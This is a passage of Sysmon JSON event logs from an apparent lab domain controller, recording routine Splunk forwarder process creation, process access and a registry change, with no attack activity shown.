RegistryEvent)","Opcode":"Info","RuleName":"T1031,T1050","UtcTime":"2020-08-01 05:48:50.095","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","Image":"C:\\Windows\\system32\\services.exe","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\npf\\ImagePath","Details":"\\??\\C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3778,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.110\r\nSourceProcessGUID: {A837DB8D-0240-5F25-0000-00107DA50500}\r\nSourceProcessId: 3916\r\nSourceThreadId: 5020\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+201f2b|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+a6c153|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.110","SourceProcessGUID":"{A837DB8D-0240-5F25-0000-00107DA50500}","SourceProcessId":"3916","SourceThreadId":"5020","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+201f2b|C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe+a6c153|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3779,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.189\r\nProcessGuid: {A837DB8D-0242-5F25-0000-00102FC60500}\r\nProcessId: 4996\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.189","ProcessGuid":"{A837DB8D-0242-5F25-0000-00102FC60500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3780,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00109C110500}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00109C110500}","TargetProcessId":"4996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3781,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0238-5F25-0000-00109C110500}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0238-5F25-0000-00109C110500}","TargetProcessId":"4996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3782,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3783,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3784,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3785,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:50.188","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3786,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:50.188\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 